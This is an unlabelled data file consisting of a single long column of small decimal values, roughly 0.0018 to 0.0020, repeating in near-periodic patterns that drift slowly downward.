0.00198414
0.00198413
0.00197964
0.00197962
0.00198415
0.00198892
0.00199346
0.00198893
0.00199344
0.00198894
0.00198414
0.00198415
0.00197963
0.00197966
0.00197962
0.00198415
0.00198415
0.00198892
0.00199345
0.00199345
0.00198898
0.00199345
0.00198893
0.00198896
0.00198414
0.00198413
0.00197964
0.00198415
0.00197962
0.00198892
0.00199346
0.00198893
0.00199344
0.00198893
0.00198415
0.00198415
0.00197963
0.00197966
0.00198415
0.00198415
0.00197963
0.00200276
0.0019982
0.0019982
0.00200274
0.00200274
0.00199822
0.0020076
0.00201205
0.00201205
0.00200756
0.00200754
0.00201205
0.00200767
0.0020076
0.00201204
0.00201205
0.00200756
0.00200767
0.00201205
0.00200754
0.00200753
0.00201205
0.00201205
0.00200751
0.00201208
0.00200751
0.00200274
0.00199823
0.00200276
0.00199835
0.00200273
0.00200273
0.00199829
0.00200274
0.00199823
0.00200275
0.00199835
0.00200273
0.00200273
0.00199829
0.00200753
0.00200274
0.00198413
0.00198892
0.00198891
0.00199343
0.00199343
0.00199345
0.0019889
0.0019889
0.00198413
0.00197975
0.00198414
0.00197963
0.00198412
0.00198412
0.00197969
0.00198413
0.00197975
0.00198414
0.00197963
0.00198412
0.00198412
0.00197969
0.00198899
0.00199343
0.00199342
0.00198894
0.00198905
0.00199343
0.00198893
0.00198898
0.00199342
0.00199342
0.00198894
0.00199343
0.00198893
0.00198905
0.00198415
0.0019796
0.0019796
0.00198413
0.00198413
0.00197962
0.00198413
0.00198891
0.00200275
0.00200276
0.00199824
0.00199827
0.00200276
0.00200276
0.00199823
0.00200754
0.00201208
0.00200755
0.00201206
0.00200755
0.00200754
0.00200759
0.00201207
0.00201208
0.00200755
0.00201207
0.00200758
0.00200275
0.00199824
0.00200274
0.00200276
0.00199822
0.00198892
0.00199345
0.00199345
0.00198898
0.00199345
0.00198896
0.00198893
0.00198414
0.00198413
0.00197964
0.00197962
0.00198416
0.00198892
0.00199346
0.00198893
0.00199344
0.00198894
0.00198415
0.00198415
0.00197966
0.00197963
0.00197963
0.00198415
0.00198415
0.00198892
0.00199345
0.00199345
0.00198898
0.00199345
0.00198893
0.00198896
0.00198414
0.00198413
0.00197964
0.00198415
0.00197962
0.00198892
0.00199346
0.00198893
0.00199344
0.00198894
0.00198414
0.00198415
0.00197963
0.00197966
0.00198415
0.00198415
0.00197963
0.00200275
0.00200276
0.00199827
0.00199823
0.00200276
0.00200275
0.00199823
0.00200753
0.00201208
0.00200755
0.00200755
0.00201206
0.00200754
0.00200759
0.00201207
0.00201207
0.00200758
0.00201207
0.00200754
0.00200275
0.00199824
0.00200274
0.00200276
0.00199822
0.00200275
0.00200276
0.00199823
0.00199827
0.00200275
0.00200276
0.00199823
0.00200753
0.00201208
0.00200755
0.00201206
0.00200755
0.00200754
0.00200759
0.00201207
0.00201207
0.00201207
0.00200754
0.00200758
0.00200275
0.00199824
0.00200274
0.00200276
0.00199822
0.00198892
0.00199345
0.00199345
0.00198897
0.00199345
0.00198896
0.00198893
0.00198414
0.00198413
0.00197963
0.00198415
0.00197962
0.00198892
0.00199346
0.00198893
0.00199344
0.00198893
0.00198414
0.00198415
0.00197966
0.00197963
0.00198415
0.00198414
0.00197962
0.00198892
0.00199345
0.00199345
0.00198897
0.00199344
0.00198893
0.00198896
0.00198414
0.00198413
0.00197963
0.00198415
0.00197962
0.00198891
0.00199346
0.00198893
0.00199344
0.00198893
0.00198414
0.00198415
0.00197963
0.00197966
0.00198414
0.00198415
0.00197962
0.00200276
0.0019982
0.0019982
0.00200274
0.00200274
0.00199822
0.0020076
0.00201205
0.00201205
0.00200756
0.00200754
0.00201205
0.00200767
0.0020076
0.00201204
0.00201205
0.00200756
0.00200767
0.00201205
0.00200754
0.00200753
0.00201205
0.00201205
0.00200752
0.00201208
0.00200752
0.00200274
0.00199823
0.00200275
0.00199836
0.00200273
0.00200273
0.00199829
0.00200274
0.00199823
0.00200275
0.00199835
0.00200273
0.00200273
0.00199829
0.00200753
0.00200274
0.00198413
0.00198892
0.00198892
0.00199343
0.00199343
0.00199345
0.0019889
0.0019889
0.00198413
0.00197975
0.00198414
0.00197963
0.00198412
0.00198412
0.00197969
0.00198413
0.00197975
0.00198414
0.00197963
0.00198412
0.00198412
0.00197969
0.00198899
0.00199343
0.00199342
0.00198894
0.00198905
0.00199343
0.00198893
0.00198899
0.00199343
0.00199342
0.00198894
0.00199343
0.00198893
0.00198905
0.00198415
0.0019796
0.0019796
0.00198413
0.00198413
0.00197962
0.00198413
0.00198891
0.00200275
0.00200276
0.00199827
0.00199823
0.00200276
0.00200275
0.00199823
0.00200753
0.00201208
0.00200755
0.00200755
0.00201206
0.00200754
0.00200759
0.00201207
0.00201207
0.00200758
0.00201207
0.00200754
0.00200275
0.00199824
0.00200274
0.00200276
0.00199822
0.00200275
0.00200276
0.00199827
0.00199823
0.00200276
0.00200275
0.00199823
0.00200753
0.00201208
0.00200755
0.00201206
0.00200755
0.00200754
0.00200759
0.00201207
0.00201207
0.00201207
0.00200758
0.00200754
0.00200275
0.00199824
0.00200274
0.00200276
0.00199822
0.00198892
0.00199345
0.00199345
0.00198898
0.00199345
0.00198896
0.00198893
0.00198414
0.00198413
0.00197964
0.00198415
0.00197962
0.00198892
0.00199346
0.00198893
0.00199344
0.00198893
0.00198414
0.00198415
0.00197966
0.00197963
0.00198415
0.00198414
0.00197962
0.00198892
0.00199345
0.00199345
0.00198898
0.00199345
0.00198896
0.00198893
0.00198414
0.00198413
0.00197963
0.00198415
0.00197962
0.00198892
0.00199346
0.00198893
0.00199344
0.00198893
0.00198414
0.00198415
0.00197966
0.00197963
0.00198415
0.00198414
0.00197962
0.00200753
0.00200274
0.00200753
0.00200274
0.00198891
0.00199343
0.00199343
0.00199345
0.0019889
0.0019889
0.00198412
0.00197975
0.00198414
0.00197963
0.00197968
0.00198412
0.00198412
0.00198412
0.00197975
0.00198414
0.00197963
0.00197968
0.00198412
0.00198412
0.00198898
0.00199342
0.00199342
0.00198894
0.00199342
0.00198905
0.00198892
0.00198898
0.00199342
0.00199342
0.00198894
0.00199342
0.00198905
0.00198893
0.00198415
0.0019796
0.0019796
0.00197962
0.00198413
0.00198413
0.00198412
0.00198891
0.00198413
0.00198891
0.00197033
0.00196555
0.00197033
0.00196555
0.00196557
0.00196103
0.00196103
0.00196555
0.00196555
0.00196104
0.0019704
0.00197482
0.00197483
0.00197036
0.00197483
0.00197034
0.00197046
0.0019704
0.00197482
0.00197483
0.00197035
0.00197483
0.00197034
0.00197046
0.00197033
0.00197484
0.00197484
0.00197486
0.00197031
0.00197031
0.00196554
0.00196105
0.00196556
0.00196117
0.00196554
0.00196111
0.00196553
0.00196554
0.00196105
0.00196556
0.00196117
0.00196554
0.00196111
0.00196553
0.001947
0.00195177
0.001947
0.00195177
0.00195177
0.00195627
0.00195627
0.00195629
0.00195175
0.00195175
0.001947
0.00194263
0.00194702
0.00194251
0.001947
0.00194698
0.00194257
0.001947
0.00194263
0.00194702
0.00194251
0.001947
0.00194698
0.00194257
0.00195183
0.00195627
0.00195625
0.0019518
0.00195626
0.00195178
0.00195189
0.00195183
0.00195627
0.00195625
0.00195179
0.00195626
0.00195178
0.00195189
0.00194702
0.00194249
0.00194249
0.001947
0.001947
0.0019425
0.00196556
0.00196557
0.00196106
0.00196109
0.00196556
0.00196557
0.00196105
0.00197033
0.00197486
0.00197034
0.00197484
0.00197034
0.00197033
0.00197038
0.00197485
0.00197486
0.00197034
0.00197485
0.00197037
0.00196556
0.00196106
0.00196555
0.00196557
0.00196105
0.00195178
0.00195629
0.00195629
0.00195183
0.00195629
0.00195178
0.00195181
0.00194701
0.001947
0.00194252
0.00194251
0.00194702
0.00195177
0.0019563
0.00195178
0.00195628
0.00195179
0.00194702
0.00194702
0.00194252
0.00194255
0.00194251
0.00194702
0.00194702
0.00195178
0.00195629
0.00195629
0.00195183
0.00195629
0.00195178
0.00195181
0.00194701
0.001947
0.00194252
0.00194703
0.00194251
0.00195177
0.0019563
0.00195178
0.00195628
0.00195179
0.00194702
0.00194702
0.00194252
0.00194255
0.00194702
0.00194702
0.00194251
0.00196557
0.00196103
0.00196103
0.00196555
0.00196555
0.00196104
0.00197039
0.00197482
0.00197483
0.00197035
0.00197034
0.00197483
0.00197046
0.00197039
0.00197482
0.00197483
0.00197035
0.00197046
0.00197483
0.00197034
0.00197032
0.00197483
0.00197483
0.00197031
0.00197486
0.00197031
0.00196554
0.00196105
0.00196556
0.00196117
0.00196554
0.00196553
0.00196111
0.00196554
0.00196105
0.00196556
0.00196117
0.00196553
0.00196554
0.00196111
0.00197032
0.00196555
0.001947
0.00195177
0.00195177
0.00195627
0.00195627
0.00195629
0.00195175
0.00195175
0.00194699
0.00194263
0.00194701
0.00194251
0.00194698
0.00194699
0.00194257
0.00194699
0.00194263
0.00194701
0.00194251
0.00194699
0.00194698
0.00194257
0.00195183
0.00195626
0.00195625
0.00195179
0.00195189
0.00195626
0.00195178
0.00195183
0.00195626
0.00195625
0.00195179
0.00195626
0.00195178
0.00195189
0.00194702
0.00194249
0.00194249
0.001947
0.001947
0.0019425
0.001947
0.00195177
0.00196556
0.00196557
0.00196106
0.00196109
0.00196557
0.00196557
0.00196105
0.00197033
0.00197486
0.00197034
0.00197485
0.00197035
0.00197033
0.00197039
0.00197485
0.00197486
0.00197034
0.00197485
0.00197037
0.00196556
0.00196106
0.00196555
0.00196557
0.00196105
0.00195178
0.00195629
0.00195629
0.00195183
0.00195629
0.00195181
0.00195178
0.00194701
0.001947
0.00194252
0.0019425
0.00194702
0.00195177
0.0019563
0.00195178
0.00195628
0.00195179
0.00194702
0.00194702
0.00194255
0.00194251
0.00194251
0.00194702
0.00194702
0.00195178
0.00195629
0.00195629
0.00195183
0.00195629
0.00195178
0.00195181
0.00194701
0.001947
0.00194252
0.00194702
0.0019425
0.00195177
0.0019563
0.00195178
0.00195628
0.00195179
0.00194701
0.00194702
0.00194252
0.00194255
0.00194702
0.00194702
0.00194251
0.00196556
0.00196557
0.00196109
0.00196105
0.00196556
0.00196556
0.00196105
0.00197033
0.00197486
0.00197034
0.00197034
0.00197484
0.00197033
0.00197038
0.00197485
0.00197485
0.00197037
0.00197485
0.00197034
0.00196556
0.00196106
0.00196555
0.00196557
0.00196104
0.00196556
0.00196557
0.00196105
0.00196109
0.00196556
0.00196556
0.00196105
0.00197033
0.00197486
0.00197034
0.00197484
0.00197034
0.00197033
0.00197038
0.00197485
0.00197485
0.00197485
0.00197034
0.00197037
0.00196556
0.00196106
0.00196555
0.00196557
0.00196104
0.00195177
0.00195629
0.00195629
0.00195182
0.00195628
0.00195181
0.00195178
0.00194701
0.001947
0.00194252
0.00194702
0.0019425
0.00195177
0.0019563
0.00195178
0.00195628
0.00195178
0.00194701
0.00194702
0.00194254
0.00194251
0.00194702
0.00194701
0.00194251
0.00195177
0.00195629
0.00195629
0.00195182
0.00195628
0.00195178
0.00195181
0.00194701
0.001947
0.00194252
0.00194702
0.0019425
0.00195177
0.00195629
0.00195178
0.00195628
0.00195178
0.00194701
0.00194702
0.00194251
0.00194254
0.00194702
0.00194702
0.00194251
0.00196557
0.00196103
0.00196103
0.00196555
0.00196555
0.00196104
0.0019704
0.00197482
0.00197483
0.00197035
0.00197034
0.00197483
0.00197046
0.00197039
0.00197482
0.00197483
0.00197035
0.00197046
0.00197483
0.00197034
0.00197033
0.00197484
0.00197484
0.00197031
0.00197486
0.00197031
0.00196554
0.00196105
0.00196556
0.00196117
0.00196554
0.00196553
0.00196111
0.00196554
0.00196105
0.00196556
0.00196117
0.00196554
0.00196554
0.00196111
0.00197033
0.00196555
0.001947
0.00195177
0.00195177
0.00195627
0.00195627
0.00195629
0.00195175
0.00195175
0.00194699
0.00194263
0.00194701
0.00194251
0.00194698
0.00194699
0.00194257
0.00194699
0.00194263
0.00194702
0.00194251
0.00194699
0.00194699
0.00194257
0.00195183
0.00195627
0.00195625
0.00195179
0.00195189
0.00195626
0.00195178
0.00195183
0.00195627
0.00195625
0.00195179
0.00195626
0.00195178
0.00195189
0.00194702
0.00194249
0.00194249
0.001947
0.001947
0.0019425
0.001947
0.00195177
0.00196556
0.00196557
0.00196109
0.00196106
0.00196556
0.00196556
0.00196105
0.00197033
0.00197486
0.00197034
0.00197034
0.00197484
0.00197033
0.00197038
0.00197485
0.00197485
0.00197037
0.00197485
0.00197034
0.00196556
0.00196106
0.00196555
0.00196557
0.00196104
0.00196556
0.00196557
0.00196109
0.00196106
0.00196557
0.00196556
0.00196105
0.00197033
0.00197486
0.00197034
0.00197484
0.00197034
0.00197033
0.00197038
0.00197485
0.00197485
0.00197485
0.00197037
0.00197034
0.00196556
0.00196106
0.00196555
0.00196557
0.00196104
0.00195178
0.00195629
0.00195629
0.00195183
0.00195629
0.00195181
0.00195178
0.00194701
0.001947
0.00194252
0.00194703
0.00194251
0.00195177
0.0019563
0.00195178
0.00195628
0.00195179
0.00194702
0.00194702
0.00194255
0.00194252
0.00194702
0.00194702
0.00194251
0.00195178
0.00195629
0.00195629
0.00195183
0.00195629
0.00195181
0.00195178
0.00194701
0.001947
0.00194252
0.00194703
0.00194251
0.00195177
0.0019563
0.00195178
0.00195628
0.00195179
0.00194702
0.00194702
0.00194255
0.00194252
0.00194702
0.00194702
0.00194251
0.00197032
0.00196555
0.00197033
0.00196555
0.00195177
0.00195627
0.00195627
0.00195629
0.00195175
0.00195175
0.00194699
0.00194263
0.00194701
0.00194251
0.00194257
0.00194698
0.00194699
0.00194699
0.00194263
0.00194702
0.00194251
0.00194257
0.00194699
0.001947
0.00195183
0.00195626
0.00195625
0.00195179
0.00195626
0.00195189
0.00195178
0.00195183
0.00195626
0.00195625
0.00195179
0.00195626
0.00195189
0.00195178
0.00194702
0.00194249
0.00194249
0.0019425
0.001947
0.001947
0.001947
0.00195177
0.001947
0.00195177
0.00193325
0.00192849
0.00193325
0.00192849
0.00192851
0.00192399
0.00192399
0.00192849
0.00192849
0.001924
0.00193331
0.00193772
0.00193774
0.00193327
0.00193773
0.00193326
0.00193337
0.00193331
0.00193772
0.00193774
0.00193327
0.00193773
0.00193326
0.00193337
0.00193325
0.00193774
0.00193774
0.00193776
0.00193323
0.00193323
0.00192848
0.00192401
0.0019285
0.00192412
0.00192849
0.00192407
0.00192847
0.00192848
0.00192402
0.00192851
0.00192413
0.00192849
0.00192407
0.00192847
0.00191003
0.00191478
0.00191003
0.00191477
0.00191477
0.00191926
0.00191926
0.00191928
0.00191476
0.00191476
0.00191002
0.00190567
0.00191004
0.00190557
0.00191002
0.00191001
0.00190562
0.00191002
0.00190567
0.00191004
0.00190556
0.00191002
0.00191001
0.00190562
0.00191483
0.00191925
0.00191923
0.0019148
0.00191924
0.00191478
0.00191489
0.00191483
0.00191925
0.00191923
0.0019148
0.00191924
0.00191478
0.00191489
0.00191005
0.00190554
0.00190554
0.00191003
0.00191003
0.00190555
0.00192851
0.00192851
0.00192402
0.00192405
0.00192851
0.00192851
0.00192401
0.00193325
0.00193777
0.00193327
0.00193775
0.00193327
0.00193326
0.0019333
0.00193776
0.00193776
0.00193326
0.00193776
0.00193329
0.0019285
0.00192402
0.0019285
0.00192852
0.00192401
0.00191478
0.00191927
0.00191927
0.00191482
0.00191927
0.00191478
0.00191481
0.00191004
0.00191003
0.00190557
0.00190555
0.00191005
0.00191477
0.00191928
0.00191479
0.00191926
0.00191479
0.00191004
0.00191004
0.00190556
0.00190559
0.00190556
0.00191004
0.00191004
0.00191478
0.00191927
0.00191927
0.00191482
0.00191927
0.00191478
0.00191481
0.00191003
0.00191002
0.00190557
0.00191005
0.00190556
0.00191477
0.00191928
0.00191477
0.00191926
0.00191478
0.00191004
0.00191004
0.00190556
0.00190559
0.00191004
0.00191004
0.00190556
0.00192851
0.00192399
0.00192399
0.00192849
0.00192849
0.001924
0.00193331
0.00193772
0.00193774
0.00193328
0.00193326
0.00193773
0.00193337
0.00193331
0.00193772
0.00193774
0.00193327
0.00193337
0.00193773
0.00193326
0.00193325
0.00193774
0.00193774
0.00193323
0.00193776
0.00193323
0.00192848
0.00192401
0.00192851
0.00192412
0.00192849
0.00192847
0.00192407
0.00192848
0.00192401
0.0019285
0.00192412
0.00192847
0.00192849
0.00192407
0.00193325
0.00192849
0.00191002
0.00191476
0.00191477
0.00191925
0.00191925
0.00191927
0.00191475
0.00191476
0.00191002
0.00190567
0.00191004
0.00190557
0.00191001
0.00191002
0.00190562
0.00191002
0.00190567
0.00191004
0.00190557
0.00191002
0.00191001
0.00190562
0.00191483
0.00191924
0.00191923
0.00191479
0.00191489
0.00191924
0.00191478
0.00191483
0.00191925
0.00191923
0.0019148
0.00191924
0.00191478
0.00191489
0.00191005
0.00190554
0.00190554
0.00191003
0.00191003
0.00190556
0.00191003
0.00191477
0.0019285
0.00192851
0.00192401
0.00192405
0.00192851
0.0019285
0.00192401
0.00193325
0.00193777
0.00193326
0.00193775
0.00193327
0.00193325
0.0019333
0.00193776
0.00193776
0.00193326
0.00193775
0.00193329
0.0019285
0.00192402
0.00192849
0.00192851
0.00192401
0.00191478
0.00191927
0.00191927
0.00191482
0.00191927
0.00191481
0.00191478
0.00191004
0.00191003
0.00190557
0.00190555
0.00191005
0.00191477
0.00191928
0.00191479
0.00191926
0.00191479
0.00191004
0.00191004
0.00190559
0.00190556
0.00190556
0.00191004
0.00191004
0.00191478
0.00191927
0.00191927
0.00191482
0.00191927
0.00191478
0.00191481
0.00191004
0.00191003
0.00190557
0.00191005
0.00190555
0.00191477
0.00191928
0.00191478
0.00191926
0.00191479
0.00191004
0.00191004
0.00190556
0.00190559
0.00191004
0.00191004
0.00190556
0.0019285
0.00192851
0.00192404
0.00192401
0.0019285
0.0019285
0.00192401
0.00193325
0.00193776
0.00193326
0.00193326
0.00193775
0.00193325
0.0019333
0.00193776
0.00193776
0.00193329
0.00193775
0.00193326
0.0019285
0.00192402
0.00192849
0.00192851
0.00192401
0.0019285
0.00192851
0.00192401
0.00192405
0.00192851
0.00192851
0.00192401
0.00193325
0.00193777
0.00193326
0.00193775
0.00193326
0.00193325
0.0019333
0.00193776
0.00193776
0.00193775
0.00193326
0.00193329
0.0019285
0.00192402
0.00192849
0.00192851
0.00192401
0.00191478
0.00191927
0.00191927
0.00191482
0.00191927
0.00191481
0.00191478
0.00191004
0.00191003
0.00190557
0.00191005
0.00190556
0.00191477
0.00191928
0.00191478
0.00191926
0.00191479
0.00191004
0.00191005
0.00190559
0.00190556
0.00191004
0.00191004
0.00190556
0.00191478
0.00191927
0.00191927
0.00191482
0.00191927
0.00191478
0.00191481
0.00191004
0.00191003
0.00190557
0.00191005
0.00190556
0.00191477
0.00191928
0.00191479
0.00191926
0.00191479
0.00191004
0.00191004
0.00190556
0.00190559
0.00191004
0.00191004
0.00190556
0.00192851
0.00192399
0.00192399
0.00192849
0.00192849
0.001924
0.00193331
0.00193772
0.00193774
0.00193327
0.00193326
0.00193773
0.00193337
0.00193331
0.00193772
0.00193774
0.00193328
0.00193337
0.00193773
0.00193326
0.00193325
0.00193774
0.00193774
0.00193323
0.00193776
0.00193323
0.00192848
0.00192402
0.00192851
0.00192413
0.00192849
0.00192847
0.00192407
0.00192848
0.00192402
0.00192851
0.00192413
0.00192847
0.00192849
0.00192407
0.00193325
0.00192849
0.00191003
0.00191477
0.00191477
0.00191926
0.00191926
0.00191928
0.00191476
0.00191476
0.00191002
0.00190567
0.00191004
0.00190556
0.00191001
0.00191002
0.00190562
0.00191002
0.00190567
0.00191004
0.00190557
0.00191002
0.00191001
0.00190562
0.00191483
0.00191925
0.00191923
0.0019148
0.00191489
0.00191925
0.00191478
0.00191483
0.00191925
0.00191923
0.0019148
0.00191925
0.00191478
0.00191489
0.00191005
0.00190554
0.00190554
0.00191003
0.00191003
0.00190555
0.00191003
0.00191477
0.00192851
0.00192851
0.00192405
0.00192402
0.00192851
0.00192851
0.00192401
0.00193325
0.00193777
0.00193326
0.00193327
0.00193775
0.00193326
0.0019333
0.00193776
0.00193776
0.00193329
0.00193776
0.00193326
0.0019285
0.00192402
0.00192849
0.00192852
0.00192401
0.00192851
0.00192851
0.00192405
0.00192402
0.00192851
0.00192851
0.00192401
0.00193325
0.00193777
0.00193326
0.00193775
0.00193327
0.00193326
0.0019333
0.00193776
0.00193776
0.00193776
0.00193329
0.00193326
0.0019285
0.00192402
0.00192849
0.00192852
0.00192401
0.00191478
0.00191927
0.00191927
0.00191483
0.00191927
0.00191481
0.00191479
0.00191004
0.00191003
0.00190557
0.00191005
0.00190556
0.00191477
0.00191928
0.00191479
0.00191927
0.00191479
0.00191004
0.00191005
0.00190559
0.00190557
0.00191004
0.00191005
0.00190556
0.00191478
0.00191927
0.00191927
0.00191483
0.00191927
0.00191482
0.00191479
0.00191004
0.00191003
0.00190557
0.00191005
0.00190556
0.00191478
0.00191928
0.00191479
0.00191927
0.00191479
0.00191004
0.00191005
0.0019056
0.00190557
0.00191004
0.00191005
0.00190556
0.00193325
0.00192849
0.00193325
0.00192849
0.00191477
0.00191926
0.00191926
0.00191928
0.00191476
0.00191476
0.00191002
0.00190567
0.00191004
0.00190557
0.00190562
0.00191001
0.00191003
0.00191002
0.00190568
0.00191004
0.00190557
0.00190562
0.00191001
0.00191003
0.00191484
0.00191925
0.00191924
0.0019148
0.00191925
0.0019149
0.00191479
0.00191484
0.00191925
0.00191923
0.0019148
0.00191925
0.00191489
0.00191479
0.00191005
0.00190554
0.00190554
0.00190556
0.00191003
0.00191003
0.00191003
0.00191477
0.00191003
0.00191478
0.00189635
0.00189161
0.00189635
0.00189162
0.00189164
0.00188713
0.00188714
0.00189161
0.00189162
0.00188715
0.00189641
0.0019008
0.00190082
0.00189637
0.00190081
0.00189636
0.00189647
0.00189641
0.00190079
0.00190081
0.00189637
0.00190081
0.00189636
0.00189647
0.00189635
0.00190083
0.00190082
0.00190084
0.00189634
0.00189633
0.00189161
0.00188716
0.00189163
0.00188727
0.00189161
0.00188722
0.0018916
0.00189161
0.00188717
0.00189163
0.00188727
0.00189162
0.00188722
0.0018916
0.00187328
0.00187799
0.00187328
0.00187799
0.00187799
0.00188244
0.00188244
0.00188246
0.00187798
0.00187797
0.00187327
0.00186895
0.00187329
0.00186885
0.00187327
0.00187325
0.00186889
0.00187327
0.00186895
0.00187329
0.00186885
0.00187327
0.00187325
0.00186889
0.00187805
0.00188244
0.00188242
0.00187801
0.00188243
0.001878
0.0018781
0.00187805
0.00188244
0.00188242
0.00187801
0.00188243
0.001878
0.0018781
0.0018733
0.00186882
0.00186882
0.00187328
0.00187328
0.00186883
0.00189163
0.00189164
0.00188717
0.0018872
0.00189164
0.00189163
0.00188717
0.00189635
0.00190084
0.00189636
0.00190083
0.00189637
0.00189635
0.0018964
0.00190083
0.00190083
0.00189636
0.00190083
0.00189639
0.00189163
0.00188718
0.00189162
0.00189164
0.00188716
0.00187799
0.00188246
0.00188245
0.00187804
0.00188245
0.001878
0.00187803
0.00187329
0.00187328
0.00186885
0.00186884
0.0018733
0.00187799
0.00188246
0.001878
0.00188245
0.001878
0.00187329
0.00187329
0.00186884
0.00186887
0.00186884
0.00187329
0.00187329
0.00187799
0.00188246
0.00188246
0.00187804
0.00188246
0.001878
0.00187803
0.00187329
0.00187328
0.00186885
0.0018733
0.00186884
0.00187799
0.00188247
0.001878
0.00188245
0.001878
0.00187329
0.00187329
0.00186884
0.00186887
0.00187329
0.00187329
0.00186884
0.00189165
0.00188715
0.00188715
0.00189163
0.00189163
0.00188716
0.00189641
0.0019008
0.00190082
0.00189637
0.00189636
0.00190081
0.00189647
0.00189641
0.0019008
0.00190082
0.00189638
0.00189647
0.00190081
0.00189636
0.00189635
0.00190082
0.00190082
0.00189634
0.00190084
0.00189634
0.00189161
0.00188717
0.00189164
0.00188728
0.00189162
0.0018916
0.00188722
0.00189161
0.00188717
0.00189164
0.00188728
0.0018916
0.00189162
0.00188722
0.00189635
0.00189162
0.00187328
0.00187799
0.00187799
0.00188245
0.00188245
0.00188247
0.00187798
0.00187798
0.00187327
0.00186895
0.0018733
0.00186886
0.00187326
0.00187328
0.0018689
0.00187327
0.00186895
0.00187329
0.00186885
0.00187328
0.00187326
0.0018689
0.00187805
0.00188244
0.00188242
0.00187802
0.00187811
0.00188243
0.001878
0.00187805
0.00188244
0.00188242
0.00187801
0.00188243
0.001878
0.00187811
0.0018733
0.00186883
0.00186883
0.00187329
0.00187329
0.00186884
0.00187328
0.00187799
0.00189163
0.00189164
0.00188717
0.0018872
0.00189163
0.00189163
0.00188716
0.00189635
0.00190084
0.00189636
0.00190083
0.00189636
0.00189635
0.0018964
0.00190083
0.00190083
0.00189636
0.00190083
0.00189639
0.00189163
0.00188717
0.00189162
0.00189164
0.00188716
0.00187799
0.00188245
0.00188246
0.00187804
0.00188245
0.00187802
0.001878
0.00187329
0.00187328
0.00186884
0.00186883
0.0018733
0.00187799
0.00188246
0.001878
0.00188245
0.001878
0.00187329
0.00187329
0.00186887
0.00186884
0.00186884
0.00187329
0.00187329
0.00187799
0.00188246
0.00188245
0.00187804
0.00188245
0.001878
0.00187802
0.00187329
0.00187328
0.00186885
0.0018733
0.00186884
0.00187799
0.00188246
0.001878
0.00188245
0.001878
0.00187329
0.00187329
0.00186884
0.00186887
0.00187329
0.00187329
0.00186884
0.00189164
0.00189164
0.0018872
0.00188717
0.00189163
0.00189164
0.00188717
0.00189635
0.00190084
0.00189636
0.00189637
0.00190083
0.00189635
0.0018964
0.00190083
0.00190083
0.00189639
0.00190083
0.00189636
0.00189163
0.00188718
0.00189162
0.00189165
0.00188717
0.00189164
0.00189164
0.00188717
0.0018872
0.00189164
0.00189164
0.00188717
0.00189635
0.00190084
0.00189637
0.00190083
0.00189637
0.00189636
0.0018964
0.00190084
0.00190083
0.00190083
0.00189636
0.00189639
0.00189164
0.00188718
0.00189163
0.00189165
0.00188717
0.001878
0.00188246
0.00188246
0.00187804
0.00188246
0.00187803
0.001878
0.00187329
0.00187328
0.00186885
0.0018733
0.00186884
0.00187799
0.00188247
0.001878
0.00188246
0.001878
0.0018733
0.0018733
0.00186887
0.00186885
0.00187329
0.0018733
0.00186884
0.001878
0.00188246
0.00188246
0.00187804
0.00188246
0.001878
0.00187803
0.00187329
0.00187328
0.00186885
0.0018733
0.00186884
0.00187799
0.00188247
0.001878
0.00188246
0.00187801
0.0018733
0.0018733
0.00186885
0.00186888
0.0018733
0.00187329
0.00186884
0.00189164
0.00188715
0.00188715
0.00189162
0.00189163
0.00188716
0.00189641
0.00190079
0.00190081
0.00189637
0.00189636
0.00190081
0.00189647
0.00189641
0.0019008
0.00190082
0.00189638
0.00189647
0.00190081
0.00189636
0.00189635
0.00190082
0.00190082
0.00189634
0.00190084
0.00189634
0.00189161
0.00188717
0.00189163
0.00188728
0.00189162
0.0018916
0.00188722
0.00189161
0.00188717
0.00189164
0.00188728
0.0018916
0.00189162
0.00188722
0.00189635
0.00189162
0.00187328
0.00187799
0.00187799
0.00188244
0.00188245
0.00188246
0.00187798
0.00187798
0.00187327
0.00186895
0.00187329
0.00186885
0.00187325
0.00187327
0.00186889
0.00187327
0.00186895
0.00187329
0.00186885
0.00187328
0.00187326
0.00186889
0.00187805
0.00188244
0.00188242
0.00187801
0.0018781
0.00188243
0.001878
0.00187805
0.00188244
0.00188242
0.00187801
0.00188243
0.001878
0.0018781
0.0018733
0.00186882
0.00186882
0.00187328
0.00187328
0.00186883
0.00187328
0.00187799
0.00189164
0.00189164
0.0018872
0.00188717
0.00189163
0.00189164
0.00188717
0.00189635
0.00190084
0.00189637
0.00189637
0.00190083
0.00189636
0.0018964
0.00190083
0.00190084
0.00189639
0.00190083
0.00189636
0.00189163
0.00188718
0.00189162
0.00189165
0.00188717
0.00189164
0.00189164
0.0018872
0.00188717
0.00189164
0.00189164
0.00188717
0.00189636
0.00190085
0.00189637
0.00190083
0.00189637
0.00189636
0.0018964
0.00190084
0.00190084
0.00190084
0.00189639
0.00189636
0.00189164
0.00188718
0.00189163
0.00189165
0.00188717
0.001878
0.00188246
0.00188246
0.00187804
0.00188246
0.00187803
0.001878
0.00187329
0.00187328
0.00186885
0.0018733
0.00186884
0.00187799
0.00188247
0.001878
0.00188246
0.001878
0.00187329
0.00187329
0.00186887
0.00186885
0.00187329
0.00187329
0.00186884
0.001878
0.00188246
0.00188246
0.00187804
0.00188246
0.00187803
0.001878
0.00187329
0.00187328
0.00186885
0.0018733
0.00186884
0.00187799
0.00188247
0.001878
0.00188246
0.00187801
0.00187329
0.00187329
0.00186887
0.00186885
0.00187329
0.0018733
0.00186884
0.00189635
0.00189163
0.00189636
0.00189163
0.00187799
0.00188245
0.00188245
0.00188247
0.00187798
0.00187798
0.00187328
0.00186896
0.0018733
0.00186885
0.0018689
0.00187326
0.00187328
0.00187328
0.00186895
0.0018733
0.00186885
0.0018689
0.00187326
0.00187328
0.00187805
0.00188244
0.00188242
0.00187802
0.00188244
0.00187811
0.00187801
0.00187805
0.00188244
0.00188242
0.00187802
0.00188244
0.00187811
0.00187801
0.00187331
0.00186883
0.00186883
0.00186884
0.00187329
0.00187329
0.00187328
0.00187799
0.00187328
0.00187799
0.0018597
0.00185501
0.0018597
0.00185501
0.00185503
0.00185057
0.00185057
0.00185501
0.00185501
0.00185058
0.00185976
0.00186411
0.00186413
0.00185972
0.00186412
0.00185971
0.00185981
0.00185976
0.00186411
0.00186413
0.00185972
0.00186412
0.00185971
0.00185981
0.0018597
0.00186414
0.00186414
0.00186415
0.00185969
0.00185969
0.001855
0.00185059
0.00185502
0.00185069
0.00185501
0.00185064
0.00185498
0.001855
0.00185059
0.00185502
0.00185069
0.00185501
0.00185064
0.00185498
0.00183682
0.00184149
0.00183681
0.00184148
0.00184148
0.00184591
0.00184591
0.00184592
0.00184147
0.00184147
